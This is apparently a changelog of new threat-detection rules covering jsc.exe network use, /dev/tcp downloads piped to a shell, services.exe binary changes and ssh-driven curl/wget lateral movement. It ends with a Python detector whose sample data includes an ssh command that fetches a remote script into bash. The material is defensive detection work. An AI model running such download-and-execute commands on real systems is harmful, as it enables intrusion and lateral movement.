==================================================

CREATED: WIN-JSC-NETCONN (#1832)

Description

This detector identifies the Microsoft JS compiler jsc.exe establishing network connections.

ATT&CK Technique T1064
ATT&CK Technique T1127

==================================================

CREATED: NIX-SHELL-DEV-TCP (#1844)

Description

This detector identifies the use of TCP sockets (/dev/tcp) to connect to a remote IP address, download files, and redirect them into a shell for execution. Connecting to a remote host with TCP sockets is an alternative technique for downloading files and behaves similarly to wget or curl.

ATT&CK Technique T1190

==================================================

CREATED: WIN-SERVICE-BIN-FILEMOD (#1874)

Description

This detector identifies the Windows Service Control Manager, Services.exe, creating or modifying a binary. Attackers may migrate processes to the Service Control Manager because of the stability of that process, and deploy different methods of persistence.

ATT&CK Technique T1036

==================================================

CREATED: NIX-SSH-CURL-WGET-LATERAL (#1895)

Description

This detector identifies the use of ssh to send curl or wget commands to remote hosts, piping content into a shell. This technique has been used to move laterally on Linux systems.

ATT&CK Technique T1021
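
One way to express the logic described for NIX-SSH-CURL-WGET-LATERAL over process command lines, as an added example that is not the product's own detector code. The function names, the list of shells and the sample command lines are assumptions constructed for illustration.

```python
import re
import shlex

# ssh options that consume the next argument (from the ssh(1) synopsis).
SSH_OPTS_WITH_ARG = {"-" + c for c in "BbcDEeFIiJLlmOopQRSWw"}
DOWNLOADERS = {"curl", "wget"}
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}  # assumed list, extend as needed

def _base(word):
    """Strip any directory prefix, so /usr/bin/ssh matches ssh."""
    return word.rsplit("/", 1)[-1]

def remote_command(cmdline):
    """Return the command ssh passes to the remote host, or None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:          # unbalanced quotes in recorded telemetry
        argv = cmdline.split()
    if not argv or _base(argv[0]) != "ssh":
        return None
    i = 1
    while i < len(argv) and argv[i].startswith("-"):
        i += 2 if argv[i] in SSH_OPTS_WITH_ARG else 1
    rest = argv[i + 1:]         # argv[i] is the destination host
    return " ".join(rest) if rest else None

def is_ssh_download_to_shell(cmdline):
    """True when the remote command pipes curl/wget output into a shell."""
    remote = remote_command(cmdline)
    if remote is None:
        return False
    seen_download = False
    # Split on a single '|' only, so '||' is not treated as a pipe.
    for stage in re.split(r"(?<!\|)\|(?!\|)", remote):
        words = [w for w in stage.split() if w != "sudo"]
        if not words:
            continue
        if seen_download and _base(words[0]) in SHELLS:
            return True
        if any(_base(w) in DOWNLOADERS for w in words):
            seen_download = True
    return False

# Constructed sample command lines; 192.0.2.0/24 is a documentation range.
SAMPLES = [
    "ssh -i /home/ops/.ssh/id_ed25519 ops@10.0.0.12 'curl -s http://192.0.2.10/a.sh | bash'",
    "ssh ops@web01 'curl -s http://192.0.2.10/health'",
]
```

A plain remote curl or wget call is not flagged; only a download stage followed by a shell stage inside the ssh remote command matches.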
